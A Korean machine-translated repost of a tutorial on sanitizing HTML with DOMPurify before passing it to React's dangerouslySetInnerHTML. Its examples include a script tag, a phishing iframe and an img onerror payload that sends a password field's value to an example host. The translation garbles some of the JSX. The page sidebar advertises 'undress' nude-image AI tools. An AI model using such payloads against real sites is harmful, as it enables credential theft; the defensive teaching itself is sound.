React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화-JS 튜토리얼-php.cn

집

웹 프론트엔드

JS 튜토리얼

React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화

DDD

Sep 13, 2024 am 06:35 AM

Mitigate XSS exploits when using React

표지 이미지: Lautaro Andreani

...

TL: DR; 콘텐츠를 위험하게 SetInnerHTML에 덤핑하는 것은 바로 위험합니다. 입력을 명시적으로 제어하지 않는 한 SetInnerHTML에 위험하게 전달하는 모든 입력을 삭제했는지 확인하세요.

다음 구성 요소는 위험한 SetInnerHTML을 통해 XSS 공격 위험을 완화하는 간단한 예입니다.

//https://github.com/cure53/DOMPurify
import React from "react";
import DOMPurify from "dompurify";

const sanitize = (dirty) => DOMPurify.sanitize(dirty);

const DangerousHtml = ({ innerHTML, tag }) => {
  const clean = sanitize(innerHTML);

  if (typeof tag === "undefined") {
    return <div dangerouslysetinnerhtml="{{" __html: clean></div>;
  }
  return <tag dangerouslysetinnerhtml="{{" __html: clean></tag>;
};

export default DangerousHtml;

맞춤형 DangerousHtml 구성 요소를 사용하면 입력이 실제로 위험한SetInnerHTML 소품에 도달하기 전에 삭제하므로 XSS 악용 위험을 극적으로 줄일 수 있습니다.

DOMPurify는 고도로 구성 가능하므로 특정 사용 사례를 처리하거나 아래 예 중 일부를 명시적으로 허용하기 위해 예시와 같은 여러 구성요소를 갖고 싶은 경우가 있을 수 있습니다.

다음은 악용이 발생할 수 있는 방법에 대한 몇 가지 간단한 예입니다.

iFrame 및 스크립트 태그 활용

React는 악성 페이로드를 가리키는 스크립트 태그를 제거하지 않으므로 XSS가 가능합니다.

우리도 이런 방식으로 iFrame을 전달해서는 안 됩니다. 오히려 URL 및 기타 "안전한" 속성을 소품으로 전달하고 iFrame 태그에서 직접 렌더링하여 렌더링 기능과 소스에 대한 제어를 유지하거나 전용 iFrame 구성 요소를 보유해야 합니다.

예를 들어, API 요청에서 수신한 다음 악성 마크업을 생각해 보세요. dangerouslySetInnerHTML을 통해 맹목적으로 설정하면 사용자에게 다음과 같은 출력이 제공됩니다.

// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
  Hi
  <script src="https://example.com/malicious-tracking"></script>
  Fiona, here is the link to enter your bank details:
  <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`,
  }}
/>






<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
  <p>
    Hi
    <script src="https://example.com/malicious-tracking"></script>
    Fiona, here is the link to enter your bank details:
    <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
  </p>
</div>

그러나 대신 DangerousHTML 구성 요소를 사용하면 사용자가 직면할 수 있는 대부분의 위험이 완화되었음을 의미합니다.

// Bad markup going in
<dangeroushtml innerhtml="{`<p">
  Hi
  <script src="https://example.com/malicious-tracking"></script>
  Fiona, here is the link to enter your bank details:
  <iframe src="https://example.com/defo-not-the-actual-bank"></iframe>
`}
/>
</dangeroushtml>

<!-- Clean markup rendered on the DOM -->
<div>
  <p>Hi Fiona, here is the link to enter your bank details:</p>
</div>

Fiona는 어떤 이유로 웹사이트가 손상되었거나 콘텐츠가 누락되었다고 생각할 수 있습니다. 하지만 은행 정보를 피싱하는 것보다는 낫습니다!

속성 조작/중독

일부 DOM 요소에는 남용될 수 있으므로 보호해야 하는 특별한 속성이 있습니다.

이 예에서는 태그 오류입니다.

예를 들어 다음과 같습니다.

// Bad markup going in
<div dangerouslysetinnerhtml="{{" __html:>
  Hola
  <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화" >
  Sharon
`,
  }}
/>






<pre class="brush:php;toolbar:false"><!-- Bad markup rendered on the DOM -->
<div>
  <p>
    Hola
    <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화" >
    Sharon
  </p>
</div>

이 경우 이미지 요청이 결국 실패하고 사용자는 이를 전혀 알 수 없을 때 우리의 중독된 마크업이 DOM에서 데이터를 훔치고 있습니다.

DangerousHtml 구성 요소를 사용하면 이 문제를 다시 완화할 수 있습니다

// Bad markup going in
<dangeroushtml innerhtml="{`">
  Hola
  <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" onerror='fetch("https://example.com/malicious-tracking?password=" + document.querySelector("input#password").value);' alt="React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화" >
  Sharon
`}
/>
</dangeroushtml>

<!-- Clean markup rendered on the DOM -->
<div>
  <p>
    Hola
    <img  src="/static/imghwm/default1.png" data-src="none.png" class="lazy" alt="React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화" >
    Sharon
  </p>
</div>

대체 이미지를 표시하기 위해 일부 JS를 실제로 실행하고 싶을 수도 있다는 주장을 고려할 때, 우리는 이 작업을 수행하기 위해 원시적이고 정제되지 않은 HTML을 다시 신뢰해서는 안 되며 우리가 사용하는 fallbackImageURL 또는 onError 소품을 사용하는 것이 더 나은 서비스를 제공할 것입니다. 다음과 같이 이미지 태그에 명시적으로 추가할 수 있습니다.

// Usual imports
const MyImageComponent = ({ fallbackUrl, url }) => {
  // Usual component setup

  const displayFallbackImage = (evt) => {
    // If there is no fallback, do nothing
    if (!fallbackUrl) return;

    // set the url to the fallbackUrl
    evt.target.src = fallbackUrl;
  };

  return (
    <img  src="%7Burl%7D" onerror="{displayFallbackImage}" ... any other props alt="React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화" >
  );
};

...

원문 기사: https://timbryan.dev/posts/react-xss-via-dangerouslySetInnerHtml

위 내용은 React&#s `위험하게 SetInnerHTML`을 사용할 때 XSS 악용 완화의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

관련 기사

JavaScript로 문자열 문자를 교체하십시오Mar 11, 2025 am 12:07 AM

JavaScript 문자열 교체 방법 및 FAQ에 대한 자세한 설명 이 기사는 JavaScript에서 문자열 문자를 대체하는 두 가지 방법 인 내부 JavaScript 코드와 웹 페이지의 내부 HTML을 탐색합니다. JavaScript 코드 내부의 문자열을 교체하십시오 가장 직접적인 방법은 대체 () 메소드를 사용하는 것입니다. str = str.replace ( "find", "replace"); 이 메소드는 첫 번째 일치 만 대체합니다. 모든 경기를 교체하려면 정규 표현식을 사용하고 전역 플래그 g를 추가하십시오. str = str.replace (/fi

사용자 정의 Google 검색 API 설정 자습서Mar 04, 2025 am 01:06 AM

이 튜토리얼은 사용자 정의 Google 검색 API를 블로그 또는 웹 사이트에 통합하는 방법을 보여 주며 표준 WordPress 테마 검색 기능보다보다 세련된 검색 경험을 제공합니다. 놀랍게도 쉽습니다! 검색을 Y로 제한 할 수 있습니다

자신의 Ajax 웹 응용 프로그램을 구축하십시오Mar 09, 2025 am 12:11 AM

그래서 여기 당신은 Ajax라는이 일에 대해 배울 준비가되어 있습니다. 그러나 정확히 무엇입니까? Ajax라는 용어는 역동적이고 대화식 웹 컨텐츠를 만드는 데 사용되는 느슨한 기술 그룹을 나타냅니다. 원래 Jesse J에 의해 만들어진 Ajax라는 용어

예제 색상 JSON 파일Mar 03, 2025 am 12:35 AM

이 기사 시리즈는 2017 년 중반에 최신 정보와 새로운 예제로 다시 작성되었습니다. 이 JSON 예에서는 JSON 형식을 사용하여 파일에 간단한 값을 저장하는 방법을 살펴 봅니다. 키 값 쌍 표기법을 사용하여 모든 종류를 저장할 수 있습니다.

8 멋진 jQuery 페이지 레이아웃 플러그인Mar 06, 2025 am 12:48 AM

손쉬운 웹 페이지 레이아웃에 대한 jQuery 활용 : 8 에센셜 플러그인 jQuery는 웹 페이지 레이아웃을 크게 단순화합니다. 이 기사는 프로세스를 간소화하는 8 개의 강력한 JQuery 플러그인을 강조합니다. 특히 수동 웹 사이트 생성에 유용합니다.

' this ' 자바 스크립트로?Mar 04, 2025 am 01:15 AM

핵심 포인트 JavaScript에서는 일반적으로 메소드를 "소유"하는 객체를 말하지만 함수가 호출되는 방식에 따라 다릅니다. 현재 객체가 없으면 글로벌 객체를 나타냅니다. 웹 브라우저에서는 창으로 표시됩니다. 함수를 호출 할 때 이것은 전역 객체를 유지하지만 객체 생성자 또는 그 메소드를 호출 할 때는 객체의 인스턴스를 나타냅니다. call (), apply () 및 bind ()와 같은 메소드를 사용 하여이 컨텍스트를 변경할 수 있습니다. 이 방법은 주어진이 값과 매개 변수를 사용하여 함수를 호출합니다. JavaScript는 훌륭한 프로그래밍 언어입니다. 몇 년 전,이 문장은있었습니다

소스 뷰어와의 jQuery 지식을 향상시킵니다Mar 05, 2025 am 12:54 AM

JQuery는 훌륭한 JavaScript 프레임 워크입니다. 그러나 어떤 도서관과 마찬가지로, 때로는 진행 상황을 발견하기 위해 후드 아래로 들어가야합니다. 아마도 버그를 추적하거나 jQuery가 특정 UI를 달성하는 방법에 대해 궁금한 점이 있기 때문일 것입니다.

모바일 개발을위한 10 개의 모바일 치트 시트Mar 05, 2025 am 12:43 AM

이 게시물은 Android, BlackBerry 및 iPhone 앱 개발을위한 유용한 치트 시트, 참조 안내서, 빠른 레시피 및 코드 스 니펫을 컴파일합니다. 개발자가 없어서는 안됩니다! 터치 제스처 참조 안내서 (PDF) Desig를위한 귀중한 자원

See all articles

핫 AI 도구

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

MinGW - Windows용 미니멀리스트 GNU

이 프로젝트는 osdn.net/projects/mingw로 마이그레이션되는 중입니다. 계속해서 그곳에서 우리를 팔로우할 수 있습니다. MinGW: GCC(GNU Compiler Collection)의 기본 Windows 포트로, 기본 Windows 애플리케이션을 구축하기 위한 무료 배포 가능 가져오기 라이브러리 및 헤더 파일로 C99 기능을 지원하는 MSVC 런타임에 대한 확장이 포함되어 있습니다. 모든 MinGW 소프트웨어는 64비트 Windows 플랫폼에서 실행될 수 있습니다.